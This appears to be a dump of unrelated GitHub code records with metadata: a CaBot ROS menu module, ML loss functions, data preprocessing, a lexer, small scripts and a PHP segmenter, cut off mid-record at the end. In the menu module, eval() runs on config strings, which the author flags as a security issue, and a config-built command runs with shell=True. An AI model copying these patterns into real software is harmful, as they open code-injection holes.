ReconfigureAction(Action):\n \"\"\"Menu Action for reconfiguration\"\"\"\n def __init__(self, config, menu):\n super(ReconfigureAction, self).__init__(config, menu)\n self._targets = Menu.get_menu_config(config, \"targets\", error=True)\n self._error_count = 0\n\n _clients = {}\n\n def do_action(self):\n for target in self._targets:\n target_name = target[\"name\"]\n if target_name not in ReconfigureAction._clients:\n try:\n CaBotRclpyUtil.info(\"Trying to connect set_paraeters client\")\n\n ReconfigureAction._clients[target_name] = CaBotRclpyUtil.instance().node.create_client(SetParameters, f\"/{target_name}/set_parameters\")\n ReconfigureAction._clients[target_name].wait_for_service(timeout_sec=3.0)\n except:\n CaBotRclpyUtil.info(\"Timed out connecting set_parameters client\")\n\n #return True\n if target_name in ReconfigureAction._clients:\n client = ReconfigureAction._clients[target_name]\n config = target[\"config\"]\n if client is not None:\n req = SetParameters.Request()\n for key in config:\n val = config[key]\n if isinstance(val, (float,int)):\n value = val * self._menu.value\n elif isinstance(val, str):\n # TODO (security issue)\n value = eval(val)\n\n param = Parameter()\n param.name = key\n param.value = ParameterValue(value)\n req.parameters.append(param)\n\n result = client.call(req)\n CaBotRclpyUtil.info(f\"{result}\")\n return True\n self._error_count += 1\n if self._error_count > 10:\n raise RuntimeError(\"dynamic_reconfigure server is not responded\")\n return False\n\nclass SyscommandAction(Action):\n \"\"\"Menu Action for system command\"\"\"\n def __init__(self, config, menu):\n super(SyscommandAction, self).__init__(config, menu)\n self._command = Menu.get_menu_config(config, \"command\", error=True)\n\n def do_action(self):\n try:\n CaBotRclpyUtil.info(\"do_action for system command\")\n command = self._command % (self._menu.value)\n CaBotRclpyUtil.info(command)\n process = subprocess.Popen(command, preexec_fn=os.setsid, shell=True)\n process.wait(timeout=1)\n except:\n CaBotRclpyUtil.error(traceback.format_exc())\n return False\n return True\n\nclass Event(object):\n def __init__(self, origin, value):\n self.origin = origin\n self.value = value\n\nclass MenuSelectAction(Action):\n \"\"\"Menu Select Action\"\"\"\n def __init__(self, config, menu):\n super(MenuSelectAction, self).__init__(config, menu)\n\n def do_action(self):\n self._menu._menu_selected(self._menu)\n return True\n\nclass Menu(object):\n \"\"\"Menu class\"\"\"\n Undefined = 0\n List = 1\n Action = 2\n Adjust = 3\n\n def _get_path(self, name):\n return \".\".join([\"persistent\", name])\n\n def _get_saved_config(self, name, default=None):\n try:\n self.get_client.wait_for_service(timeout_sec=3.0)\n path = self._get_path(name)\n \n req = GetParameters.Request()\n req.names.append(path)\n \n CaBotRclpyUtil.info(f\"getting the param {path}\")\n result = self.get_client.call(req)\n CaBotRclpyUtil.info(f\"got the result {result}\")\n if len(result.values) == 1:\n return rclpy.parameter.parameter_value_to_python(result.values[0])\n CaBotRclpyUtil.error(\"cannot get the parameter\")\n except:\n if default is not None:\n self._save_config(name, default)\n return default\n\n def _save_config(self, name, value):\n CaBotRclpyUtil.info(\"save config\")\n try:\n CaBotRclpyUtil.info(f\"setting the param {name}: {value}\")\n self.set_client.wait_for_service(timeout_sec=3.0)\n path = self._get_path(name)\n CaBotRclpyUtil.info(f\"setting the param {path}: {value}\")\n req = SetParameters.Request()\n param = 
rclpy.parameter.Parameter(path, value=value).to_parameter_msg()\n req.parameters.append(param)\n result = self.set_client.call(req)\n CaBotRclpyUtil.info(f\"{result}\")\n except:\n CaBotRclpyUtil.error(traceback.format_exc())\n CaBotRclpyUtil.error(\"cannot save the parameter\")\n\n @staticmethod\n def get_menu_config(config, name, default=None, error=False):\n \"\"\"Utility function to get config value specified by name.\n if value is not exists return 'default' value\n if error is True and value is not exists raise KeyError\n \"\"\"\n if name in config:\n return config[name]\n elif error:\n raise KeyError(\"Config does not have '%s'\"%name)\n return default\n\n @staticmethod\n def create_menu(menu_obj, config, identifier=None, title=None, usage=None, parent=None):\n if not config:\n return None\n \n \"\"\"Create menu from config\"\"\"\n # refer menu\n menu = config[\"menu\"] if \"menu\" in config else None\n if menu is not None:\n config2 = menu_obj[menu] if menu in menu_obj else []\n return Menu.create_menu(menu_obj, config2, identifier=menu, title=title, usage=usage, parent=parent)\n\n # otherwise\n _type = Menu.get_menu_config(config, \"type\", \"item\")\n\n if _type == \"list\":\n return MenuList(menu_obj, config, identifier=identifier, parent=parent)\n elif _type == \"adjust\":\n return MenuAdjust(config, identifier=identifier, parent=parent)\n elif _type == \"item\":\n return MenuItem(config, identifier=identifier, parent=parent)\n\n raise ValueError(\"%s is not a menu type\" % (_type))\n\n\n def __init__(self, config=None, identifier=None, parent=None):\n self._title = Menu.get_menu_config(config, \"title\")\n self._usage = Menu.get_menu_config(config, \"usage\")\n self._type = Menu.Undefined\n self._config = config\n self._identifier = identifier\n self._parent = parent\n self._items = []\n self._actions = None\n self._listeners = []\n self.delegate = None\n CaBotRclpyUtil.info(\"creating SetParameters client\")\n self.set_client = CaBotRclpyUtil.instance().node.create_client(SetParameters, \"/parameter_server/set_parameters\", callback_group=MutuallyExclusiveCallbackGroup())\n CaBotRclpyUtil.info(\"creating GetParameters client\")\n self.get_client = CaBotRclpyUtil.instance().node.create_client(GetParameters, \"/parameter_server/get_parameters\", callback_group=MutuallyExclusiveCallbackGroup())\n CaBotRclpyUtil.info(f\"menu initialization complete {self._title}\")\n\n\n def __str__(self):\n text = \"\"\n if self._type == Menu.List:\n text += \"Menu List (%s, %s)\\n\" % (self._identifier, self._title) \\\n + \"\\n\".join([\" \"+str(x) for x in self._items])\n elif self._type == Menu.Action:\n text += \"Menu Action (%s, %s)\" % (self._identifier, self._title)\n elif self._type == Menu.Adjust:\n text += \"Menu Adjust (%s, %s)\" % (self._identifier, self._title)\n else:\n text += super(Menu, self).__str__()\n if self._actions is not None:\n text += \"\\n with Action (%s)\" % (self._actions)\n return text\n\n @property\n def identifier(self):\n \"\"\"Menu identifier\"\"\"\n return self._identifier\n\n @property\n def type(self):\n \"\"\"Menu type\"\"\"\n return self._type\n\n @property\n def title(self):\n \"\"\"Menu title\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def usage(self):\n \"\"\"Menu usage which is read by TTS\"\"\"\n return i18n.localized_string(self._usage)\n\n @property\n def description(self):\n \"\"\"Description of the menu\"\"\"\n return i18n.localized_string(self._title)\n\n @property\n def value(self):\n \"\"\"Value of the menu\"\"\"\n return 
None\n\n def sev_value(self, value):\n raise RuntimeError(\"not implemented\")\n\n @property\n def can_explore(self):\n return False\n\n def next(self):\n \"\"\"Move to next item or value\"\"\"\n pass\n\n def prev(self):\n \"\"\"Move to previous item or value\"\"\"\n pass\n\n def select(self):\n \"\"\"Do action for selection\"\"\"\n return self\n\n def reset(self):\n \"\"\"Reset for reuse\"\"\"\n pass\n\n def _menu_selected(self, origin):\n \"\"\"menu selected\"\"\"\n if self.delegate:\n self.delegate.menu_selected(origin)\n if self._parent is not None:\n self._parent._menu_selected(origin)\n\n\nclass MenuList(Menu):\n \"\"\"List of Menu items\"\"\"\n def __init__(self, menu_obj, config=None, identifier=None, parent=None):\n if Menu.get_menu_config(config, \"usage\") is None:\n config[\"usage\"] = \"MENU_NAVIGATE_USAGE\"\n super(MenuList, self).__init__(config=config, identifier=identifier, parent=parent)\n\n self._type = Menu.List\n self._actions = Actions.create_actions(config, self)\n\n temp = []\n items = Menu.get_menu_config(config, \"items\")\n for item in items:\n menu_item = Menu.create_menu(menu_obj, item, parent=self)\n if menu_item:\n temp.append(menu_item)\n else:\n CaBotRclpyUtil.error(\"menu {} is not found\".format(item))\n self._items = temp\n self._current = None\n\n def _get_item(self, diff, default):\n if self._current is None:\n self._current = default\n else:\n self._current = (self._current + diff) % len(self._items)\n\n if self._current is None:\n return None\n return self._items[self._current]\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n return self._get_item(0, None)\n\n @property\n def can_explore(self):\n return True\n \n def next(self):\n return self._get_item(+1, 0)\n\n def prev(self):\n return self._get_item(-1, -1)\n\n def select(self):\n if self._actions is not None:\n self._actions.do_action()\n \n return self.value\n\n def get_menu_by_identifier(self, identifier):\n for item in self._items:\n if item._identifier == identifier:\n return item\n return None\n \n @property\n def description(self):\n #return self.value.title if self.value is not None else \"not selected\"\\\n return i18n.localized_string(self.value._title) if self.value is not None else None\n\n def reset(self):\n self._current = None\n for item in self._items:\n item.reset()\n\nclass MenuAdjust(Menu):\n \"\"\"Adjustable menu\"\"\"\n def __init__(self, config=None, identifier=None, parent=None):\n super(MenuAdjust, self).__init__(config=config, identifier=identifier, parent=parent)\n self._type = Menu.Adjust\n self._max = Menu.get_menu_config(config, \"max\", error=True)\n self._min = Menu.get_menu_config(config, \"min\", error=True)\n self._values = Menu.get_menu_config(config, \"values\")\n if self._values is not None:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n else:\n self._format = Menu.get_menu_config(config, \"format\", default=\"{}\")\n if self._min >= self._max:\n raise ValueError(\"min value should be smaller than max value \" \\\n + \"(%f < %f)\"%(self._min, self._max))\n\n self._default = Menu.get_menu_config(config, \"default\", error=True)\n if self._default < self._min or self._max < self._default:\n raise ValueError(\"default value should be in min-max range \" \\\n + \"(%f < %f < %f\" % (self._min,\n self._default,\n self._max))\n\n self._step = Menu.get_menu_config(config, \"step\", 1)\n self._name = Menu.get_menu_config(config, \"name\", error=True)\n self._current = self._get_saved_current()\n self._actions = 
Actions.create_actions(config, self)\n self._check_action_once()\n \n def _check_action(self):\n if self._actions is None:\n return\n if self._actions.do_action():\n return\n CaBotRclpyUtil.info(\"retry do_action with %s\", str(self))\n self._check_action_once()\n\n @cabot_common.util.setInterval(3, 1)\n def _check_action_once(self):\n self._check_action()\n\n\n def _get_saved_current(self):\n temp = self._get_saved_config(self._name, default=self._default)\n if hasattr(self, \"_values\") and self._values is not None and isinstance(temp, str):\n temp = self._values.index(temp)\n return temp if temp is not None else self._default\n\n def _save_current(self):\n if self._actions is not None:\n self._actions.do_action()\n return self._save_config(self._name, self.value)\n\n @property\n def value(self):\n \"\"\"Current value\"\"\"\n if self._values:\n return self._values[self._current]\n return self._current\n\n def set_value(self, value):\n if self._values:\n self._current = self._values.index(value)\n else:\n self._current = value\n self._save_current()\n\n @property\n def can_explore(self):\n return True\n\n @property\n def min(self):\n \"\"\"Minimum value\"\"\"\n return self._min\n\n @property\n def max(self):\n \"\"\"Maximum value\"\"\"\n return self._max\n\n ## intentionally opposite\n def next(self): \n self._current = max(self._current - self._step, self._min)\n self._save_current()\n return self._current\n\n def prev(self):\n self._current = min(self._current + self._step, self._max)\n self._save_current()\n return self._current\n\n def select(self):\n return self\n\n @property\n def description(self):\n CaBotRclpyUtil.info(f\"{self._format}, {self._current}, {self.value}\")\n return i18n.localized_string(self._format, i18n.localized_string(self.value)) \n #\" \" + i18n.localized_string(self._title))\n\n def reset(self):\n self._current = self._get_saved_current()\n\nclass MenuItem(Menu):\n \"\"\"Menu item with action\"\"\"\n def __init__(self, config=None, identifier=None, parent=None):\n super(MenuItem, self).__init__(config=config, identifier=identifier, parent=parent)\n self._type = Menu.Action\n self._value = Menu.get_menu_config(config, \"value\")\n self._format = Menu.get_menu_config(config, \"format\", \"MENU_ITEM_SELECTED\")\n\n @property\n def description(self):\n return i18n.localized_string(self._format, i18n.localized_string(self._title))\n\n @property\n def value(self):\n return self._value\n\n @property\n def can_explore(self):\n return False\n\n def reset(self):\n pass\n\n def select(self):\n pass\n","repo_name":"CMU-cabot/cabot-navigation","sub_path":"cabot_ui/cabot_ui/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":18702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42724622525","text":"import torch\nimport torch.nn as nn\n\nclass SoftTargetLoss(nn.Module):\n '''\n Distilling the knowledge in a Neural Network\n https://arxiv.org/abs/1503.02531\n '''\n def __init__(self, T=10):\n super().__init__()\n self.T = T\n \n def forward(self, logits, targets, t):\n '''\n logits : output of the student\n targets: output of the teacher\n t : correct label\n '''\n logits = logits / self.T\n targets = targets / self.T\n soft_loss = nn.KLDivLoss(reduction='batchmean')\n hard_loss = nn.CrossEntropyLoss()\n p = nn.Softmax(dim=1)\n q = nn.LogSoftmax(dim=1)\n kd_loss = soft_loss(q(logits), p(targets)) + hard_loss(logits, t)\n return kd_loss\n \nif __name__ == '__main__':\n logits = torch.randn((32,10))\n 
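# Annotation (not in the original record): the forward above follows Hinton et\n    # al. (2015), Distilling the Knowledge in a Neural Network: KLDivLoss over\n    # log_softmax(student/T) versus softmax(teacher/T), plus a hard cross-entropy.\n    # Two deviations from the paper are worth noting: (1) the soft term is not\n    # multiplied by T**2, although soft-target gradients scale as 1/T**2, so for\n    # large T the hard term dominates; (2) because logits is reassigned to\n    # logits/T before hard_loss is applied, the hard term also sees tempered\n    # logits, whereas the paper applies temperature only to the soft targets.\n    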
targets = torch.randn((32,10))\n t = torch.randint(0, 10, (32,))\n loss = SoftTargetLoss()\n kd_loss = loss(logits, targets, t)\n print(kd_loss)\n print(loss.T)","repo_name":"motakuss/Knowledge-Distillation-Technique","sub_path":"src/kd_loss/st.py","file_name":"st.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22825837271","text":"import json\nimport pickle\nimport re\nimport numpy as np\nfrom string import punctuation\n\nwith open('../../../data/fever/support/main.json','r') as f:\n total = json.load(f)\n\n\ndef filterfun(word):\n if word in punctuation:\n return False\n else:\n return True\n\n\nclaims = []\nsentences = []\nfor i in range(len(total)):\n claims += re.sub(r'[^\\w\\s]','',total[i]['claim'].lower()).split()\n claims.append('\\n')\n sentences += re.sub(r'[^\\w\\s]','',total[i]['sentence'].lower()).split()\n sentences.append('\\n')\n\n#filtered = filter(filterfun,claims)\n#claims = []\n#for i in filtered:\n# claims.append(i)\n\n#filtered = filter(filterfun,sentences)\n#sentences = []\n#for i in filtered:\n# sentences.append(i)\n\nclaims = ' '.join(claims)\nclaims = ''.join(claims).split('\\n')\ntemp = ' '.join(claims).split()\nsentences = ' '.join(sentences)\nsentences = ''.join(sentences).split('\\n')\ntemp += ' '.join(sentences).split()\nwords = list(set(temp))\nvocab_to_int = dict()\n\n\nfor i in range(len(words)):\n vocab_to_int.update({words[i]: i})\n\nsent_ints = []\nclaim_ints = []\nlabels = []\nmxclaim = 0\nmxsent = 0\nfor i in range(len(total)):\n s = sentences[i]\n c = claims[i]\n if len(s) > mxsent:\n mxsent = len(s)\n if len(c) > mxclaim:\n mxclaim = len(c)\n sent_ints.append([vocab_to_int[word] for word in s.split()])\n claim_ints.append([vocab_to_int[word] for word in c.split()])\n labels.append(total[i]['lablel'])\n\n\nclaim_features = np.zeros((len(claim_ints), mxclaim), dtype=int)\nsent_features = np.zeros((len(sent_ints), mxsent), dtype=int)\n\nfor i, row in enumerate(claim_ints):\n claim_features[i, -len(row):] = np.array(row)[:mxclaim]\n\nfor i, row in enumerate(sent_ints):\n sent_features[i, -len(row):] = np.array(row)[:mxsent]\n\nwith open('../../../data/fever/support/train.pkl','rb') as f:\n train = pickle.load(f)\nwith open('../../../data/fever/support/val.pkl','rb') as f:\n val = pickle.load(f)\n\ntrain_claim = []\ntrain_sent = []\nval_claim = []\nval_sent = []\n\nfor i in val['lablel'].keys():\n val_claim.append(claim_features[i])\n val_sent.append(sent_features[i])\n\nfor i in train['lablel'].keys():\n train_claim.append(claim_features[i])\n train_sent.append(sent_features[i])\n\n","repo_name":"DeFacto/SimpleLSTM","sub_path":"models/SimpleLSTM/support/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"26614734393","text":"import math \n\nn = int(input())\n\nmax_L = -float(\"inf\")\nmin_R = float(\"inf\")\n\nfor i in range(n):\n l, r = map(int, input().split())\n max_L = max(max_L, l)\n min_R = min(min_R, r)\n\n if max_L <= min_R:\n print(0)\n else:\n tmp = math.ceil(abs(max_L-min_R)/2)\n print(tmp)\n","repo_name":"mei28/Competitive-programing","sub_path":"ARC-129/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75191741226","text":"import ply.lex as lex\nfrom src.toks import 
Token\n\n\nclass Lexer:\n def __init__(self):\n self.tokens = Token.tokens\n self.vars = {}\n self.lexer = None\n \n t_ignore = ' \\t'\n t_PLUS = r'\\+'\n t_MINUS = r'\\-'\n t_TIMES = r'\\*'\n t_DIVIDE = r'\\/'\n t_POWER = r'\\*\\*'\n t_LPAREN = r'\\('\n t_RPAREN = r'\\)'\n t_ASSIGN = r'\\='\n t_EQT = r'\\=\\='\n t_NEQ = r'\\!\\='\n t_LT = r'\\<'\n t_GT = r'\\>'\n t_ELT = r'\\<\\='\n t_EGT = r'\\>\\='\n t_SEMICOLON = r'\\;'\n\n def t_IDENTIFIER(self, t):\n r'[a-zA-Z_\\u0600-\\u06FF][a-zA-Z0-9_\\u0600-\\u06FF]*'\n if t.value == 'متغير':\n t.type = 'VAR'\n return t\n \n if t.value == 'صح' or t.value == 'خطا':\n \n if t.value == 'صح':\n t.value = True\n else:\n t.value = False\n t.type = 'BOOL'\n return t\n \n if t.value == 'و':\n t.type = 'AND'\n return t\n \n if t.value == 'او':\n t.type = 'OR'\n return t\n \n if t.value == 'ليس':\n t.type = 'NOT'\n return t\n \n t.type = 'IDENTIFIER'\n return t\n \n def t_FLOAT(self, t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n t.type = 'FLOAT'\n return t\n\n def t_INT(self, t):\n r'\\d+'\n t.value = int(t.value)\n t.type = 'INT'\n return t\n \n def t_NEWLINE(self, t):\n r'\\n+'\n t.lexer.lineno += len(t.value)\n return t\n\n def t_error(self, t):\n print(f\"Illegal character '{t.value[0]}'\")\n t.lexer.skip(1)\n\n def build(self, **kwargs):\n self.lexer = lex.lex(module=self, **kwargs)\n \nif __name__ == \"__main__\":\n lexer = Lexer()\n lexer.build()\n lexer.lexer.input(\"متغير ا = 10 \\n ا + 10 * 2\")\n for token in lexer.lexer:\n print(token)\n","repo_name":"GNMohamed1/Qalam","sub_path":"src/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20404328856","text":"\ndef rothess(h):\n hr=np.zeros_like(h)\n ridx={0:0,1:1,2:3,3:4,4:2}\n for i in range(5):\n for j in range(5):\n hr[i,j]=r.apply(r.apply(h[ridx[i],ridx[j]]).T).T\n return hr\ndef rotgrad(g):\n b=r.apply(g)\n b[[2,3,4]]=b[[3,4,2]]\n return b \n","repo_name":"ferchault/APDFT","sub_path":"prototyping/hessian/AAFF_backup/Libs/AP_symmetry.py","file_name":"AP_symmetry.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"37"} +{"seq_id":"35514139461","text":"import adventofcode.util as util\n\ndef get_elves_by_calorie_count(data):\n elves = []\n calories = 0\n for line in data:\n if len(line) == 0:\n elves.append(calories)\n calories = 0\n else:\n calories = calories + int(line)\n return elves\n\n\nif __name__ == '__main__':\n data = util.read_input('input.txt')\n elves = get_elves_by_calorie_count(data)\n\n max_value = max(elves)\n index = elves.index(max_value)\n\n total_kcal = 0;\n for i in range(3):\n current_max = max(elves)\n total_kcal += current_max\n elves.remove(current_max)\n\n print(total_kcal)\n\n\n\n","repo_name":"johan-ronnkvist/advent-of-code","sub_path":"adventofcode/day_01/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36537520378","text":"import numpy as np\nimport torch\nimport pickle\n\ndef load_dictionary(filename):\n\twith open(filename + '.pkl', 'rb') as f:\n\t\treturn pickle.load(f)\n\ndef pusherLoss(pushPerc, callPerc, stackSize, equity):\n\tloss = torch.mean((-1)*(-0.5*(1-pushPerc) + pushPerc*(1*(1-callPerc) + (2*stackSize*equity - stackSize)*callPerc)))\n\treturn loss\n\ndef callerLoss(pushPerc, callPerc, 
stackSize, equity):\n\tloss = torch.mean((-1)*(0.5*(1-pushPerc) + pushPerc*(-1*(1-callPerc) + (2*stackSize*(1-equity) - stackSize)*callPerc)))\n\treturn loss\n\ndef pusherLossNumpy(pushPerc, callPerc, stackSize, equity):\n\tloss = np.mean((-1)*(-0.5*(1-pushPerc) + pushPerc*(1*(1-callPerc) + (2*stackSize*equity - stackSize)*callPerc)))\n\treturn loss\n\ndef callerLossNumpy(pushPerc, callPerc, stackSize, equity):\n\tloss = np.mean((-1)*(0.5*(1-pushPerc) + pushPerc*(-1*(1-callPerc) + (2*stackSize*(1-equity) - stackSize)*callPerc)))\n\treturn loss\n\n# Cards should be rank followed by suit ('As', '7c', etc)\n# Puts cards in rank order and tells if they are suited ('AAu', '98s', etc)\ndef processHand(card1, card2, ranks):\n\thand = ''\n\tif(ranks.index(card1[0]) < ranks.index(card2[0])):\n\t\thand = hand + card1[0] + card2[0]\n\telse:\n\t\thand = hand + card2[0] + card1[0]\n\tif(card1[1] == card2[1]):\n\t\thand = hand + 's'\n\telse:\n\t\thand = hand + 'u'\n\treturn hand\n\ndef oneHotCard(card, ranks):\n\toneHot = np.zeros((1, 13))\n\toneHot[0, ranks.index(card[0])] = 1\n\treturn oneHot\n\n# 's' = suited, 'u' = offsuit, 3rd catagory for pairs\ndef oneHotSuited(suited, card1Rank, card2Rank):\n\toneHot = np.zeros((1, 3))\n\tif(suited == 's'):\n\t\toneHot[0, 0] = 1\n\telse:\n\t\tif(card1Rank != card2Rank):\n\t\t\toneHot[0, 1] = 1\n\t\telse:\n\t\t\toneHot[0, 2] = 1\n\treturn oneHot","repo_name":"rfick/push_fold_solver","sub_path":"push_fold_helper_functions.py","file_name":"push_fold_helper_functions.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21278239915","text":"import cv2\n\n# Read the original image\ndef getCanny(img):\n\t# Convert to graycsale\n\timg_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t# Blur the image for better edge detection\n\timg_blur = cv2.GaussianBlur(img_gray, (3,3), 0) \n\n\t# Sobel Edge Detection\n\tsobelx = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=1, dy=0, ksize=5) # Sobel Edge Detection on the X axis\n\tsobely = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=0, dy=1, ksize=5) # Sobel Edge Detection on the Y axis\n\tsobelxy = cv2.Sobel(src=img_blur, ddepth=cv2.CV_64F, dx=1, dy=1, ksize=5) # Combined X and Y Sobel Edge Detection\n\t# Display Sobel Edge Detection Images\n\t#cv2.imshow('Sobel X', sobelx)\n\t#cv2.waitKey(0)\n\t#cv2.imshow('Sobel Y', sobely)\n\t#cv2.waitKey(0)\n\t#cv2.imshow('Sobel X Y using Sobel() function', sobelxy)\n\t#cv2.waitKey(0)\n\n\t# Canny Edge Detection\n\tedges = cv2.Canny(image=img_blur, threshold1=100, threshold2=200) # Canny Edge Detection\n\t# Display Canny Edge Detection Image\n\t# cv2.imshow('Canny Edge Detection', edges)\n\treturn edges,sobelxy\n\t\n\n\n\n\nif __name__ == \"__main__\":\n\n vid = cv2.VideoCapture(0)\n\n NOT_CLOSE = \"NOT_CLOSE\"\n CLOSE = \"CLOSE\"\n tme = 0\n while True:\n ret, frame = vid.read()\n cv2.imshow('frame',frame)\n canny,sobelx = getCanny(frame)\n cv2.imshow('canny',canny)\n cv2.imshow('sobelx',sobelx)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n vid.release()\n cv2.destroyAllWindows()\n","repo_name":"Neotez/Control-Flow","sub_path":"new_edge.py","file_name":"new_edge.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35633806896","text":"from time import sleep\r\n\r\nfrom lxml.html import fromstring, tostring\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import 
By\r\n\r\nif __name__ == \"__main__\":\r\n url = \"https://iirmephi.ru/tutorials/npp/datasource_first/\"\r\n driver = webdriver.Firefox(executable_path=r\"C:\\Users\\khvos\\OneDrive\\Рабочий стол\\Прога\\geckodriver-v0.32.0-win64\\geckodriver.exe\")\r\n driver.get(url)\r\n source = fromstring(driver.page_source)\r\n\r\n\r\n\r\n # elements = driver.find_elements(By.XPATH, '//table/thead/tr/th/a')\r\n # x = [el.text for el in elements]\r\n\r\n elements = source.xpath('//table[contains(@class, \"table-striped\")]/thead/tr/th/a/text()')\r\n # print(elements)\r\n lst = [el.lower() for el in elements]\r\n print(lst)\r\n\r\n trs = source.xpath('//table[contains(@class, \"table-striped\")]/tbody/tr')\r\n\r\n for tr in trs:\r\n row = fromstring(tostring(tr))\r\n print(row.xpath('//td/text()'))\r\n\r\n # c = {}\r\n # for i in range(len(trs)): \r\n # lines = driver.find_elements(By.XPATH, '//table/tbody/tr')\r\n # y = [line.text for line in lines]\r\n # print(y)\r\n # for i in range(len(y)):\r\n # yy = driver.find_elements(By.XPATH, '//table/tbody/tr/td[1]')\r\n # yyy = [l.text for l in yy]\r\n # print(yyy)\r\n \r\n","repo_name":"khm2609/Learning-process","sub_path":"Parsing/Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22331463691","text":"from ..AbstractScenario import *\n\n\nclass JoinSpaceship(Scenario):\n\n def __init__(self, character, game_running):\n super().__init__(character, game_running)\n\n def run(self):\n print(\"As you wander through the spaceport, you see three different spacecraft that are about to depart.\\n\"\n \"Which one do you want to join?\\n\")\n\n selection = choice_input([\n \"Pirate ship (+3 combat, -2 leadership, +1 engineering)\",\n \"Royal navy ship (+3 leadership, +1 combat)\",\n \"Asteroid mining vessel (+3 engineering, -2 combat, +1 piloting)\"\n ])\n\n modified_skills = {}\n selected_ship = None\n\n if selection == 1:\n print(\"You have joined a pirate ship crew!\")\n modified_skills = {\n \"leadership\": -2,\n \"combat\": 3,\n \"engineering\": 1\n }\n selected_ship = 'pirate'\n elif selection == 2:\n print(\"You have joined a royal navy crew!\")\n modified_skills = {\n \"leadership\": 3,\n \"combat\": 1,\n }\n selected_ship = 'navy'\n elif selection == 3:\n print(\"You have joined an asteroid mining vessel!\")\n modified_skills = {\n \"combat\": -2,\n \"engineering\": 3\n }\n selected_ship = 'mining'\n\n # Update the characters skills based off the selection\n for skill, value in modified_skills.items():\n try:\n self.character.skills[skill] += value\n except KeyError:\n pass\n self.character.ship = selected_ship\n # Display our stats now we're done\n self.character.display_current_stats()\n","repo_name":"MKJSmith/SciFi","sub_path":"src/scenarios/common/JoinSpaceship.py","file_name":"JoinSpaceship.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10988182827","text":"from phply.phpparse import make_parser\nfrom phply.phplex import lexer\nfrom phply import phpast as ast\n\nfrom langchain.document_loaders.parsers.language.code_segmenter import CodeSegmenter\n\n\nclass PHPSegmenter(CodeSegmenter):\n \"\"\"Code segmenter for `Python`.\"\"\"\n\n def __init__(self, code: str):\n super().__init__(code)\n self.source_lines = self.code.splitlines()\n\n\n def is_valid(self):\n try:\n parser = make_parser()\n result = 
parser.parse(self.code, lexer.clone())\n            parser.restart()\n            return True\n        except AssertionError:\n            return False\n        except SyntaxError:\n            return False\n\n    def _get_line_indexes(self, node):\n        start = node.lineno - 1\n        inner = [n for n in node.nodes if isinstance(n, (ast.Node))]\n        if len(inner) > 0:\n            last_node = inner[-1]\n            if isinstance(last_node, (ast.Method, ast.Class)):\n                [_, end] = self._get_line_indexes(last_node)\n            else:\n                end = last_node.lineno\n            end = end + 1\n        else:\n            end = node.lineno - 1\n        return [start,end]\n    \n    def _extract_code(self, node):\n        [start, end] = self._get_line_indexes(node)\n        return \"\\n\".join(self.source_lines[start:end])\n\n    def extract_functions_classes(self):\n        functions_classes = []\n        parser = make_parser()\n        result = parser.parse(self.code, lexer.clone())\n        parser.restart()\n\n        for node in result:\n            if isinstance(node, (ast.Class, ast.Function)):\n                code = self._extract_code(node)\n                functions_classes.append(code)\n\n        return functions_classes\n\n    def simplify_code(self):\n        all_lines = self.source_lines[:]\n        parser = make_parser()\n        result = parser.parse(self.code, lexer.clone())\n        parser.restart()\n\n        for node in result:\n            if isinstance(node, (ast.Class, ast.Function)):\n                [start, end] = self._get_line_indexes(node)\n\n                all_lines[start] = f'// Simplified Code for {all_lines[start]}'\n\n                for i in range(start + 1, end):\n                    all_lines[i] = None\n\n        return \"\\n\".join(line for line in all_lines if line is not None)\n","repo_name":"stuartpearce-hg/Ideagen-GenAI-Workshop","sub_path":"workshop/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33391648697","text":"\"\"\"\n    Created by Amirk on 2018-07-29.\n\"\"\"\nimport json\n\nfrom flask import current_app\nimport requests\nfrom app.model.base import db\nfrom app.model.user_book_case import UserBookCase\nfrom app.model.userinfo import UserInfo\n\n\nclass RquestWxSessionKey:\n    \"\"\"Request the WeChat API for the openid and save the user info to the database\"\"\"\n\n    def __init__(self, data):\n        self.data = data\n        self.session_key = None\n        self.appId = current_app.config['APPID']\n        self.secret = current_app.config['APP_SECRET_KEY']\n        self.openId = None\n        self.userinfo = self.data.get('userinfo')\n        self.url = 